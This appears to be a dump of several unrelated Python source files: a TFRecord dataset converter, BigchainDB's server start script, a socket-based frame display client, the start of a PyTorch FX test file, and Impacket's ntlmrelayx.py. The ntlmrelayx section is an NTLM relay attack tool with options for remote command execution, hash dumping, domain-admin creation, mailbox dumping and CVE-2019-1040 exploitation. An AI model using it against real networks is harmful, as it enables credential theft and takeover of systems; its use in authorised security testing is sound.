assert len(image.shape) == 3
assert image.shape[2] == self.num_channels
return image
def _convert_dataset(dataset_name, phase_name, filenames, class_names_to_ids, output_dir, num_shards,
num_channels=3, attr_map=None):
"""Converts the given filenames to a TFRecord dataset.
Args:
dataset_name: The name of the dataset.
phase_name: The name of the split, e.g. 'train' or 'validation'.
filenames: A list of absolute paths to png or jpg images.
class_names_to_ids: A dictionary from class names (strings) to ids
(integers).
output_dir: The directory where the converted datasets are stored.
"""
num_per_shard = int(math.ceil(len(filenames) / float(num_shards)))
with tf.Graph().as_default():
image_reader = ImageReader(num_channels)
with tf.Session('') as sess:
for shard_id in range(num_shards):
assert not os.path.isfile(output_dir)
if not os.path.isdir(output_dir):
os.makedirs(output_dir)
output_filename = _get_dataset_filename(dataset_name, output_dir, phase_name, shard_id, num_shards)
with tf.python_io.TFRecordWriter(output_filename) as tfrecord_writer:
start_ndx = shard_id * num_per_shard
end_ndx = min((shard_id + 1) * num_per_shard, len(filenames))
for i in range(start_ndx, end_ndx):
sys.stdout.write('\r>> Converting image %d/%d shard %d, %s' % (
i + 1, len(filenames), shard_id, filenames[i]))
sys.stdout.flush()
# Read the filename:
try:
image_data = tf.gfile.FastGFile(filenames[i], 'rb').read()
height, width = image_reader.read_image_dims(sess, image_data)
except:
continue
class_name = os.path.basename(os.path.dirname(filenames[i]))
class_id = class_names_to_ids[class_name]
attr = None
if attr_map is not None:
attr = attr_map[os.path.basename(filenames[i])]
ext = 'jpg'
if sys.version_info[0] == 3:
ext = ext.encode()
class_name = class_name.encode()
example = dataset_utils.image_to_tfexample(image_data, ext, height, width, class_id, class_name,
attr)
tfrecord_writer.write(example.SerializeToString())
sys.stdout.write('\n')
sys.stdout.flush()
def _clean_up_temporary_files(dataset_dir):
"""Removes temporary files used to create the dataset.
Args:
dataset_dir: The directory where the temporary files are stored.
"""
dirs = os.listdir(dataset_dir)
for tmp_dir in dirs:
shutil.rmtree(os.path.join(dataset_dir, tmp_dir))
def make_tfrecords_train_test(dataset_name, train_ratio, image_dir, output_dir, num_shards, num_channels,
remove_images):
if not tf.gfile.Exists(image_dir):
tf.gfile.MakeDirs(image_dir)
if _dataset_exists(dataset_name, output_dir, "train", num_shards):
print('Dataset files already exist. Exiting without re-creating them.')
return False
if not os.path.isdir(output_dir):
os.makedirs(output_dir)
training_filenames, test_filenames, class_names = _get_filenames_and_classes_by_train_test(image_dir, train_ratio)
class_names_to_ids = dict(zip(class_names, range(len(class_names))))
_convert_dataset(dataset_name, "train", training_filenames, class_names_to_ids, output_dir, num_shards,
num_channels)
_convert_dataset(dataset_name, "test", test_filenames, class_names_to_ids, output_dir, num_shards,
num_channels)
# Finally, write the labels file:
labels_to_class_names = dict(zip(range(len(class_names)), class_names))
dataset_utils.write_label_file(labels_to_class_names, output_dir, dataset_name)
if remove_images:
_clean_up_temporary_files(image_dir)
return True
def make_tfrecords(dataset_name, phase_name, image_dir, output_dir, num_shards, num_channels, remove_images,
attr_path=None):
if not tf.gfile.Exists(image_dir):
tf.gfile.MakeDirs(image_dir)
if _dataset_exists(dataset_name, output_dir, phase_name, num_shards):
print('Dataset files already exist. Exiting without re-creating them.')
return False
if not os.path.isdir(output_dir):
os.makedirs(output_dir)
random.seed(0)
photo_filenames, class_names = _get_filenames_and_classes(image_dir)
random.shuffle(photo_filenames)
np.save(os.path.join(output_dir, "file_names_%s.npy" % phase_name), photo_filenames)
class_names_to_ids = dict(zip(class_names, range(len(class_names))))
# todo: add bounding box, landmarks, etc data
# First, convert the training and validation sets.
attr_map = None
if attr_path is not None:
assert os.path.isfile(attr_path)
attr_map = json.load(open(attr_path))
_convert_dataset(dataset_name, phase_name, photo_filenames, class_names_to_ids, output_dir, num_shards,
num_channels, attr_map)
# Finally, write the labels file:
labels_to_class_names = dict(zip(range(len(class_names)), class_names))
json.dump(labels_to_class_names, open(os.path.join(output_dir, "labels_%s.json" % phase_name), "w+"))
dataset_utils.write_label_file(labels_to_class_names, output_dir, "%s_%s" % (dataset_name, phase_name))
if remove_images:
_clean_up_temporary_files(image_dir)
return True
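# Illustrative usage sketch (paths and dataset name below are hypothetical, not from this repo):
#   make_tfrecords("fashion", "train", "/data/images/train", "/data/tfrecords",
#                  num_shards=4, num_channels=3, remove_images=False)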
if __name__ == '__main__':
fl = tf.app.flags
fl.DEFINE_boolean('parallel_exec', False, '')
fl.DEFINE_boolean('multiple', True, '')
fl.DEFINE_string('dataset_name', "fashionstyle14", "")
fl.DEFINE_string('phase_name', "train", "")
fl.DEFINE_string('image_dir',
'D:/data/fashion/image_retrieval/images_for_tfrecord/warehouse2shopall', '')
fl.DEFINE_string('tfrecord_output',
'D:/data/fashion/image_retrieval/images_for_tfrecord/warehouse2shopall_tfrecord',
'')
fl.DEFINE_string('attr_path',
None,
'')
fl.DEFINE_float('train_ratio', None, '')
fl.DEFINE_integer('num_channels', 3, '')
fl.DEFINE_integer('num_shards', 4, '')
fl.DEFINE_boolean('remove_images', False, '')
F = tf.app.flags.FLAGS
if F.multiple:
image_dirs = glob.glob(os.path.join(F.image_dir, "*"))
for image_dir in image_dirs:
if F.train_ratio is None:
p = Process(target=make_tfrecords, args=(
F.dataset_name, os.path.basename(image_dir), image_dir, F.tfrecord_output, F.num_shards,
F.num_channels, F.remove_images, F.attr_path))
else:
p = Process(target=make_tfrecords_train_test, args=(
F.dataset_name + "_" + os.path.basename(image_dir), F.train_ratio, image_dir, F.tfrecord_output,
F.num_shards,
F.num_channels, F.remove_images))
print("started to build tfrecords: %s" % (image_dir))
p.start()
if not F.parallel_exec:
p.join()
else:
if F.train_ratio is None:
make_tfrecords(F.dataset_name, F.phase_name, F.image_dir, F.tfrecord_output, F.num_shards, F.num_channels,
F.remove_images, F.attr_path)
else:
make_tfrecords_train_test(F.dataset_name, F.train_ratio, F.image_dir, F.tfrecord_output, F.num_shards,
F.num_channels, F.remove_images)
|
start.py
|
# Copyright BigchainDB GmbH and BigchainDB contributors
# SPDX-License-Identifier: (Apache-2.0 AND CC-BY-4.0)
# Code is Apache-2.0 and docs are CC-BY-4.0
import logging
import setproctitle
import bigchaindb
from bigchaindb.lib import BigchainDB
from bigchaindb.core import App
from bigchaindb.parallel_validation import ParallelValidationApp
from bigchaindb.web import server, websocket_server
from bigchaindb.events import Exchange, EventTypes
from bigchaindb.utils import Process
logger = logging.getLogger(__name__)
BANNER = """
****************************************************************************
* *
* ┏┓ ╻┏━╸┏━╸╻ ╻┏━┓╻┏┓╻╺┳┓┏┓ ┏━┓ ┏━┓ ╺┳┓┏━╸╻ ╻ *
* ┣┻┓┃┃╺┓┃ ┣━┫┣━┫┃┃┗┫ ┃┃┣┻┓ ┏━┛ ┃┃┃ ┃┃┣╸ ┃┏┛ *
* ┗━┛╹┗━┛┗━╸╹ ╹╹ ╹╹╹ ╹╺┻┛┗━┛ ┗━╸╹┗━┛╹╺┻┛┗━╸┗┛ *
* codename "fluffy cat" *
* Initialization complete. BigchainDB Server is ready and waiting. *
* *
* You can send HTTP requests via the HTTP API documented in the *
* BigchainDB Server docs at: *
* https://bigchaindb.com/http-api *
* *
* Listening to client connections on: {:<15} *
* *
****************************************************************************
"""
def start(args):
# Exchange object for event stream api
logger.info('Starting BigchainDB')
exchange = Exchange()
# start the web api
app_server = server.create_server(
settings=bigchaindb.config['server'],
log_config=bigchaindb.config['log'],
bigchaindb_factory=BigchainDB)
p_webapi = Process(name='bigchaindb_webapi', target=app_server.run, daemon=True)
p_webapi.start()
logger.info(BANNER.format(bigchaindb.config['server']['bind']))
# start websocket server
p_websocket_server = Process(name='bigchaindb_ws',
target=websocket_server.start,
daemon=True,
args=(exchange.get_subscriber_queue(EventTypes.BLOCK_VALID),))
p_websocket_server.start()
p_exchange = Process(name='bigchaindb_exchange', target=exchange.run, daemon=True)
p_exchange.start()
# We need to import this after spawning the web server
# because importing ABCIServer will monkeypatch all sockets
# for gevent.
from abci import ABCIServer
setproctitle.setproctitle('bigchaindb')
# Start the ABCIServer
if args.experimental_parallel_validation:
app = ABCIServer(app=ParallelValidationApp(events_queue=exchange.get_publisher_queue()))
else:
app = ABCIServer(app=App(events_queue=exchange.get_publisher_queue()))
app.run()
if __name__ == '__main__':
start()
|
ntlmrelayx.py
|
#!/opt/impacket-impacket_0_9_20/bin/python3
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Generic NTLM Relay Module
#
# Authors:
# Alberto Solino (@agsolino)
# Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
#
# Description:
# This module performs the SMB Relay attacks originally discovered
# by cDc extended to many target protocols (SMB, MSSQL, LDAP, etc).
# It receives a list of targets and for every connection received it
# will choose the next target and try to relay the credentials. Also, if
# specified, it will first try to authenticate against the client connecting
# to us.
#
# It is implemented by invoking an SMB and an HTTP server, hooking into a few
# functions and then using the specific protocol clients (e.g. SMB, LDAP).
# It is supposed to work at any LM Compatibility level. The only way
# to stop this attack is to enforce SPN checks and/or signing on the server.
#
# If the authentication against the targets succeeds, the client authentication
# succeeds as well and a valid connection is set against the local smbserver.
# It's up to the user to set up the local smbserver functionality. One option
# is to set up shares with whatever files you want so that the victim thinks it's
# connected to a valid SMB server. All that is done through the smb.conf file or
# programmatically.
#
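#
# Illustrative invocations (flags are the ones defined in the argument parser below;
# target addresses and filenames are hypothetical):
#   ntlmrelayx.py -t smb://10.0.0.5 -smb2support
#   ntlmrelayx.py -tf targets.txt -socks -of hashes
#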
import argparse
import sys
import logging
import cmd
try:
from urllib.request import ProxyHandler, build_opener, Request
except ImportError:
from urllib2 import ProxyHandler, build_opener, Request
import json
from threading import Thread
from impacket import version
from impacket.examples import logger
from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer
from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig
from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor, TargetsFileWatcher
from impacket.examples.ntlmrelayx.servers.socksserver import SOCKS
RELAY_SERVERS = []
class MiniShell(cmd.Cmd):
def __init__(self, relayConfig, threads):
cmd.Cmd.__init__(self)
self.prompt = 'ntlmrelayx> '
self.tid = None
self.relayConfig = relayConfig
self.intro = 'Type help for list of commands'
self.relayThreads = threads
self.serversRunning = True
@staticmethod
def printTable(items, header):
colLen = []
for i, col in enumerate(header):
rowMaxLen = max([len(row[i]) for row in items])
colLen.append(max(rowMaxLen, len(col)))
outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])
# Print header
print(outputFormat.format(*header))
print(' '.join(['-' * itemLen for itemLen in colLen]))
# And now the rows
for row in items:
print(outputFormat.format(*row))
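# Illustrative call (header matches the one used by do_socks below; row values are made up):
#   MiniShell.printTable([['SMB', '10.0.0.5', 'DOM/user', 'TRUE', '445']],
#                        header=['Protocol', 'Target', 'Username', 'AdminStatus', 'Port'])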
def emptyline(self):
pass
def do_targets(self, line):
for url in self.relayConfig.target.originalTargets:
print(url.geturl())
return
def do_socks(self, line):
headers = ["Protocol", "Target", "Username", "AdminStatus", "Port"]
url = "http://localhost:9090/ntlmrelayx/api/v1.0/relays"
try:
proxy_handler = ProxyHandler({})
opener = build_opener(proxy_handler)
response = Request(url)
r = opener.open(response)
result = r.read()
items = json.loads(result)
except Exception as e:
logging.error("ERROR: %s" % str(e))
else:
if len(items) > 0:
self.printTable(items, header=headers)
else:
logging.info('No Relays Available!')
def do_startservers(self, line):
if not self.serversRunning:
start_servers(options, self.relayThreads)
self.serversRunning = True
logging.info('Relay servers started')
else:
logging.error('Relay servers are already running!')
def do_stopservers(self, line):
if self.serversRunning:
stop_servers(self.relayThreads)
self.serversRunning = False
logging.info('Relay servers stopped')
else:
logging.error('Relay servers are already stopped!')
def do_exit(self, line):
print("Shutting down, please wait!")
return True
def do_EOF(self, line):
return self.do_exit(line)
def start_servers(options, threads):
for server in RELAY_SERVERS:
#Set up config
c = NTLMRelayxConfig()
c.setProtocolClients(PROTOCOL_CLIENTS)
c.setRunSocks(options.socks, socksServer)
c.setTargets(targetSystem)
c.setExeFile(options.e)
c.setCommand(options.c)
c.setEnumLocalAdmins(options.enum_local_admins)
c.setEncoding(codec)
c.setMode(mode)
c.setAttacks(PROTOCOL_ATTACKS)
c.setLootdir(options.lootdir)
c.setOutputFile(options.output_file)
c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access)
c.setMSSQLOptions(options.query)
c.setInteractive(options.interactive)
c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max)
c.setIPv6(options.ipv6)
c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
c.setSMB2Support(options.smb2support)
c.setInterfaceIp(options.interface_ip)
c.setExploitOptions(options.remove_mic, options.remove_target)
c.setWebDAVOptions(options.serve_image)
if server is HTTPRelayServer:
c.setListeningPort(options.http_port)
c.setDomainAccount(options.machine_account, options.machine_hashes, options.domain)
elif server is SMBRelayServer:
c.setListeningPort(options.smb_port)
#If the redirect option is set, configure the HTTP server to redirect targets to SMB
if server is HTTPRelayServer and options.r is not None:
c.setMode('REDIRECT')
c.setRedirectHost(options.r)
#Use target randomization if configured and the server is not SMB
#SMB server at the moment does not properly store active targets so selecting them randomly will cause issues
if server is not SMBRelayServer and options.random:
c.setRandomTargets(True)
s = server(c)
s.start()
threads.add(s)
return c
def stop_servers(threads):
todelete = []
for thread in threads:
# isinstance() requires a type or a tuple of types, not a list
if isinstance(thread, tuple(RELAY_SERVERS)):
thread.server.shutdown()
todelete.append(thread)
# Now remove threads from the set
for thread in todelete:
threads.remove(thread)
del thread
# Process command-line arguments.
if __name__ == '__main__':
# Init the example's logger theme
logger.init()
print(version.BANNER)
#Parse arguments
parser = argparse.ArgumentParser(add_help = False, description = "For every connection received, this module will "
"try to relay that connection to specified target(s) system or the original client")
parser._optionals.title = "Main options"
#Main arguments
parser.add_argument("-h","--help", action="help", help='show this help message and exit')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-t',"--target", action='store', metavar = 'TARGET', help='Target to relay the credentials to, '
'can be an IP, hostname or URL like smb://server:445. If unspecified, it will relay back to the client')
parser.add_argument('-tf', action='store', metavar = 'TARGETSFILE', help='File that contains targets by hostname or '
'full URL, one per line')
parser.add_argument('-w', action='store_true', help='Watch the target file for changes and update target list '
'automatically (only valid with -tf)')
parser.add_argument('-i','--interactive', action='store_true',help='Launch an smbclient console instead '
'of executing a command after a successful relay. This console will listen locally on a '
'tcp port and can be reached with for example netcat.')
# Interface address specification
parser.add_argument('-ip','--interface-ip', action='store', metavar='INTERFACE_IP', help='IP address of interface to '
'bind SMB and HTTP servers',default='')
serversoptions = parser.add_mutually_exclusive_group()
serversoptions.add_argument('--no-smb-server', action='store_true', help='Disables the SMB server')
serversoptions.add_argument('--no-http-server', action='store_true', help='Disables the HTTP server')
parser.add_argument('--smb-port', type=int, help='Port for the SMB server to listen on', default=445)
parser.add_argument('--http-port', type=int, help='Port for the HTTP server to listen on', default=80)
parser.add_argument('-ra','--random', action='store_true', help='Randomize target selection (HTTP server only)')
parser.add_argument('-r', action='store', metavar = 'SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER')
parser.add_argument('-l','--lootdir', action='store', type=str, required=False, metavar = 'LOOTDIR',default='.', help='Loot '
'directory in which gathered loot such as SAM dumps will be stored (default: current directory).')
parser.add_argument('-of','--output-file', action='store',help='base output filename for encrypted hashes. Suffixes '
'will be added for ntlm and ntlmv2')
parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default '
'"%s"). If errors are detected, run chcp.com at the target, '
'map the result with '
'https://docs.python.org/2.4/lib/standard-encodings.html and then execute ntlmrelayx.py '
'again with -codec and the corresponding codec ' % sys.getdefaultencoding())
parser.add_argument('-smb2support', action="store_true", default=False, help='SMB2 Support (experimental!)')
parser.add_argument('-socks', action='store_true', default=False,
help='Launch a SOCKS proxy for the connection relayed')
parser.add_argument('-wh','--wpad-host', action='store',help='Enable serving a WPAD file for Proxy Authentication attack, '
'setting the proxy host to the one supplied.')
parser.add_argument('-wa','--wpad-auth-num', action='store',help='Prompt for authentication N times for clients without MS16-077 installed '
'before serving a WPAD file.')
parser.add_argument('-6','--ipv6', action='store_true',help='Listen on both IPv6 and IPv4')
parser.add_argument('--remove-mic', action='store_true',help='Remove MIC (exploit CVE-2019-1040)')
parser.add_argument('--serve-image', action='store',help='Local path of the image that will be returned to clients')
#SMB arguments
smboptions = parser.add_argument_group("SMB client options")
smboptions.add_argument('-e', action='store', required=False, metavar = 'FILE', help='File to execute on the target system. '
'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)')
smboptions.add_argument('-c', action='store', type=str, required=False, metavar = 'COMMAND', help='Command to execute on '
'target system. If not specified, hashes will be dumped (secretsdump.py must be in the same '
'directory).')
smboptions.add_argument('--enum-local-admins', action='store_true', required=False, help='If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)')
#MSSQL arguments
mssqloptions = parser.add_argument_group("MSSQL client options")
mssqloptions.add_argument('-q','--query', action='append', required=False, metavar = 'QUERY', help='MSSQL query to execute '
'(can specify multiple)')
#HTTPS options
httpoptions = parser.add_argument_group("HTTP options")
httpoptions.add_argument('-machine-account', action='store', required=False,
help='Domain machine account to use when interacting with the domain to grab a session key for '
'signing, format is domain/machine_name')
httpoptions.add_argument('-machine-hashes', action="store", metavar="LMHASH:NTHASH",
help='Domain machine hashes, format is LMHASH:NTHASH')
httpoptions.add_argument('-domain', action="store", help='Domain FQDN or IP to connect using NETLOGON')
httpoptions.add_argument('-remove-target', action='store_true', default=False,
help='Try to remove the target in the challenge message (in case CVE-2019-1019 patch is not installed)')
#LDAP options
ldapoptions = parser.add_argument_group("LDAP client options")
ldapoptions.add_argument('--no-dump', action='store_false', required=False, help='Do not attempt to dump LDAP information')
ldapoptions.add_argument('--no-da', action='store_false', required=False, help='Do not attempt to add a Domain Admin')
ldapoptions.add_argument('--no-acl', action='store_false', required=False, help='Disable ACL attacks')
ldapoptions.add_argument('--no-validate-privs', action='store_false', required=False, help='Do not attempt to enumerate privileges, assume permissions are granted to escalate a user via ACL attacks')
ldapoptions.add_argument('--escalate-user', action='store', required=False, help='Escalate privileges of this user instead of creating a new one')
ldapoptions.add_argument('--add-computer', action='store_true', required=False, help='Attempt to add a new computer account')
ldapoptions.add_argument('--delegate-access', action='store_true', required=False, help='Delegate access on relayed computer account to the specified account')
#IMAP options
imapoptions = parser.add_argument_group("IMAP client options")
imapoptions.add_argument('-k','--keyword', action='store', metavar="KEYWORD", required=False, default="password", help='IMAP keyword to search for. '
'If not specified, will search for mails containing "password"')
imapoptions.add_argument('-m','--mailbox', action='store', metavar="MAILBOX", required=False, default="INBOX", help='Mailbox name to dump. Default: INBOX')
imapoptions.add_argument('-a','--all', action='store_true', required=False, help='Instead of searching for keywords, '
'dump all emails')
imapoptions.add_argument('-im','--imap-max', action='store',type=int, required=False,default=0, help='Max number of emails to dump '
'(0 = unlimited, default: no limit)')
try:
options = parser.parse_args()
except Exception as e:
logging.error(str(e))
sys.exit(1)
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)
# Let's register the protocol clients we have
# ToDo: Do this better somehow
from impacket.examples.ntlmrelayx.clients import PROTOCOL_CLIENTS
from impacket.examples.ntlmrelayx.attacks import PROTOCOL_ATTACKS
if options.codec is not None:
codec = options.codec
else:
codec = sys.getdefaultencoding()
if options.target is not None:
logging.info("Running in relay mode to single host")
mode = 'RELAY'
targetSystem = TargetsProcessor(singleTarget=options.target, protocolClients=PROTOCOL_CLIENTS)
else:
if options.tf is not None:
#Targetfile specified
logging.info("Running in relay mode to hosts in targetfile")
targetSystem = TargetsProcessor(targetListFile=options.tf, protocolClients=PROTOCOL_CLIENTS)
mode = 'RELAY'
else:
logging.info("Running in reflection mode")
targetSystem = None
mode = 'REFLECTION'
if not options.no_smb_server:
RELAY_SERVERS.append(SMBRelayServer)
if not options.no_http_server:
RELAY_SERVERS.append(HTTPRelayServer)
if options.r is not None:
logging.info("Running HTTP server in redirect mode")
if targetSystem is not None and options.w:
watchthread = TargetsFileWatcher(targetSystem)
watchthread.start()
threads = set()
socksServer = None
if options.socks is True:
# Start a SOCKS proxy in the background
socksServer = SOCKS()
socksServer.daemon_threads = True
socks_thread = Thread(target=socksServer.serve_forever)
socks_thread.daemon = True
socks_thread.start()
threads.add(socks_thread)
c = start_servers(options, threads)
print("")
logging.info("Servers started, waiting for connections")
try:
if options.socks:
shell = MiniShell(c, threads)
shell.cmdloop()
else:
sys.stdin.read()
except KeyboardInterrupt:
pass
else:
pass
if options.socks is True:
socksServer.shutdown()
del socksServer
for s in threads:
del s
sys.exit(0)
|
rawframe_display.py
|
import sys
import functools
import signal
import select
import socket
import pickle
import time
import struct
import numpy as np
import matplotlib.pyplot as plt
from multiprocessing import Process, Queue
sys.path.append('../dhmsw/')
import interface
PLOT = True
headerStruct = struct.Struct('III')
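# Wire format assumed by this client, inferred from the unpacking in DisplayThread below:
#   header : struct 'III' -> (msgid, srcid, totalbytes), e.g. headerStruct.pack(1, 2, 1024)
#   payload: one 'H' for ndim, then 'H' * ndim dimension values, then the raw frame data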
class guiclient(object):
def __init__(self):
self.sock = None
self.displaythread = Process(target=self.DisplayThread)
self.displaythread.daemon = True
self.displayQ = Queue()
self.exit = False
self.maxlen = 150995023
for sig in [signal.SIGTERM, signal.SIGINT, signal.SIGHUP, signal.SIGQUIT]:
signal.signal(sig, self.signal_handler)
def signal_handler(self, signal, frame):
self.exit = True
self.displayQ.put(None)
def restore_frame(self, data, meta, z):
w, h, compval, val, size, actualsize,ts, gain, ccdtemp = meta
dtidx = 0
for i in range(0, w*h,compval):
z[i] = data[dtidx]
dtidx += 1
def DisplayThread(self):
z = np.zeros((2448,2050),dtype=np.uint8)
mydata2 = np.ones(2448*2050, dtype=np.uint8) * 255
f = None
axes = None
if PLOT:
f, axes = plt.subplots(sharex=True)
for i in range(1):
#axes[i].imshow(z, extent=[0,2448,0,2050], aspect="auto", cmap='gray')
axes.clear()
#axes.imshow(z, extent=[0,2448,0,2050], aspect="auto", cmap='gray')
while True:
msg = self.displayQ.get()
if msg is None:
break
print("**************** Display Thread")
msgid, srcid, totalbytes= headerStruct.unpack(msg[0:struct.calcsize(headerStruct.format)])
meta = (msgid, srcid, totalbytes)
offset = struct.calcsize(headerStruct.format)
print('offset=%d'%(offset))
ndim_struct = struct.Struct('H')
ndimsize = struct.calcsize(ndim_struct.format)
ndim = ndim_struct.unpack(msg[offset:offset + ndimsize])[0]
dimStruct = struct.Struct('H'*int(ndim))
dimsize = struct.calcsize(dimStruct.format)
dimensions = dimStruct.unpack(msg[offset + ndimsize:offset + ndimsize + dimsize])
offset = offset + ndimsize + dimsize
if srcid == interface.SRCID_IMAGE_FOURIER:
dtype = np.complex64
w, h = dimensions
elif srcid == interface.SRCID_IMAGE_RAW:
dtype = np.uint8
w, h = dimensions
#elif srcid == interface.SRCID_IMAGE_AMPLITUDE or srcid == interface.SRCID_IMAGE_PHASE or srcid == interface.SRCID_IMAGE_AMPLITUDE_AND_PHASE:
else:
dtype = np.float32
w, h, z, l = dimensions
outdata = np.fromstring(msg[offset:offset+(functools.reduce(lambda x,y: x*y, dimensions)*np.dtype(dtype).itemsize)], dtype=dtype).reshape(dimensions)
#print("&&&&& Max=%f, Min=%f, QueueSize=%d"%(np.max(outdata[:,:]), np.min(outdata[:,:]), self.displayQ.qsize()))
if PLOT:
if srcid == interface.SRCID_IMAGE_RAW:
#axes[i].imshow(mydata[:,:], extent=[0,w,0,h], aspect="auto", cmap='gray')
axes.clear()
axes.imshow(outdata[:,:], extent=[0,h,0,w], aspect="auto")
axes.set_title('Max=%.3f'%(np.max(outdata[:,:])))
elif srcid == interface.SRCID_IMAGE_FOURIER:
axes.clear()
axes.imshow(outdata[:,:], extent=[0,h,0,w], aspect="auto")
axes.set_title('Max=%.3f'%(np.max(outdata[:,:])))
else:
axes.clear()
axes.imshow(outdata[:,:,0,0], extent=[0,h,0,w], aspect="auto")
axes.set_title('Max=%.3f'%(np.max(outdata[:,:,0,0])))
plt.suptitle(repr(time.time()))
plt.draw()
#plt.show(block=False)
plt.pause(0.001)
print('End of DisplayThread')
def connect_to_server(self, server, port):
#headerStruct = struct.Struct('HHBIIIHH')
totlen = 0
count = 0
### Continuous receive of data
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((server, port))
self.readfds = [self.sock]
### Start Display Thread
self.displaythread.start()
length = None
buf = b''
data = b''
msg=b''
lasttime = time.time()
meta = None
totalbytes = 0
while True:
#infds, outfds, errfds = select.select(self.readfds, [], [], 5)
infds, outfds, errfds = select.select(self.readfds, [], [], 5)
if not (infds or outfds or errfds):
continue
if self.exit: break
for s in infds:
if s is self.sock:
### Get as much data as we can
packet = self.sock.recv(150995023)
if not packet:
self.exit = True
self.displayQ.put_nowait(None)
break
data += packet
datalen = len(data)
print('len packet= %d'%(len(packet)))
### If we haven't processed the header/meta yet, do it now.
#if meta is None and datalen > struct.calcsize(headerStruct.format)+25:
if meta is None and datalen > struct.calcsize(headerStruct.format):
#packet = self.sock.recv(12)
#print("Recieve: %s"%(':'.join("{:02x}".format(ord(c)) for c in packet[0:50])))
msg_id, srcid, totalbytes = headerStruct.unpack(data[0:struct.calcsize(headerStruct.format)])
totalbytes += struct.calcsize(headerStruct.format)
meta = (msg_id, srcid)
print('msg_id=%d, srcid=%d, totalbytes=%d'%(msg_id, srcid, totalbytes))
if datalen >= totalbytes: ### We have a complete packet stored.
msg = data[:totalbytes]
data = data[totalbytes:]
meta = None
totalbytes = 0
#print('Counter=%d, Queue.Size=%d'%(count, self.displayQ.qsize()))
print('%.2f Hz'%(1/(time.time()-lasttime)))
lasttime = time.time()
#plt.show(block=False)
count+=1
#if self.displayQ.qsize() == 0:
self.displayQ.put_nowait(msg)
print('Full message received after getting meta: datalen=%d, datalen after=%d'%(datalen, len(data)))
else:
if datalen < totalbytes:
continue
### We have a complete message
msg = data[:totalbytes]
data = data[totalbytes:]
print('Full message received: datalen=%d, datalen after=%d'%(datalen, len(data)))
meta = None
totalbytes = 0
#if self.displayQ.qsize() == 0:
self.displayQ.put_nowait(msg)
#print('Counter=%d, Queue.Size=%d'%(count, self.displayQ.qsize()))
print('%.2f Hz'%(1/(time.time()-lasttime)))
lasttime = time.time()
count+=1
if self.exit: break
self.sock.close()
if __name__ == "__main__":
a = guiclient()
host= 'localhost' #socket.gethostname()
port = 9995
print("Client host: %s: port: %d"%(host, port))
a.connect_to_server(host, port)
|
test_fx.py
|
import builtins
import contextlib
import copy
import functools
import inspect
import math
import numbers
import operator
import os
import pickle
import sys
import torch
import traceback
import warnings
import unittest
from math import sqrt
from torch.multiprocessing import Process
from torch.testing import FileCheck
from torch.testing._internal.common_methods_invocations import op_db
from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests
import torch.utils._pytree as pytree
import torch.fx._pytree as fx_pytree
from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap, PH
import torch._C._fx
from torch.fx.node import Target, Argument
from torch.fx.passes import shape_prop
from torch.fx.immutable_collections import immutable_dict, immutable_list
from torch.fx.experimental.rewriter import RewritingTracer
from torch.fx.operator_schemas import get_signature_for_torch_op
from copy import deepcopy
from collections import namedtuple
from torch.fx.proxy import TraceError
from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401
from fx.test_dce_pass import TestDCE # noqa: F401
from fx.test_fx_const_fold import TestConstFold # noqa: F401
from fx.test_fx_param_shape_control_flow import TestConstParamShapeInControlFlow # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import AnnotationsTest # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import TypeCheckerTest # noqa: F401
from typing import Any, Callable, Dict, NamedTuple, List, Optional, Set, Tuple, Union
from torch.testing._internal.common_utils import (
IS_FBCODE,
IS_MACOS,
IS_WINDOWS,
TEST_WITH_ROCM,
find_library_location,
run_tests,
)
from torch.testing._internal.jit_utils import JitTestCase
from fx.named_tup import MyNamedTup
try:
from torchvision import models as torchvision_models
HAS_TORCHVISION = True
except ImportError:
HAS_TORCHVISION = False
skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision")
class SimpleTest(torch.nn.Module):
def forward(self, x):
return torch.relu(x + 3.0)
def a_non_torch_leaf(a, b):
return a + b
# Used for test_autowrap_function. Autowrapped functions need to be global
def fx_int(x: float) -> int:
return int(x)
def fx_int_x2(x: float) -> int:
return int(x) * 2
# used in test_pytree. It's all the way out here because pickling a GraphModule
# that uses Point errors out if Point is local to the function
Point = namedtuple('Point', ['x', 'y'])
# Test wrap() passing both a function name as well as a function
# directly
def a_lifted_leaf(a, b):
return a[0] + a[1] + b
wrap('a_lifted_leaf')
# Test wrapping twice doesn't break anything
wrap('a_lifted_leaf')
def a_lifted_leaf2(a, b):
return a[0] + a[1] + b
wrap(a_lifted_leaf2)
wrap('len')
@wrap
def wrapped_via_decorator(a):
return a + 1
wrap('wrapped_with_submodule')
def wrapped_with_submodule(x: torch.Tensor, batchnorm1d: torch.nn.BatchNorm1d):
return batchnorm1d(x)
real_wrapped_via_decorator = wrapped_via_decorator
real_a_lifed_leaf = a_lifted_leaf
real_a_lifed_leaf2 = a_lifted_leaf2
_sqrt = sqrt
wrap('wrapper_fn')
def wrapper_fn(x):
return torch.foo(x)
class Pair(NamedTuple):
x : torch.Tensor
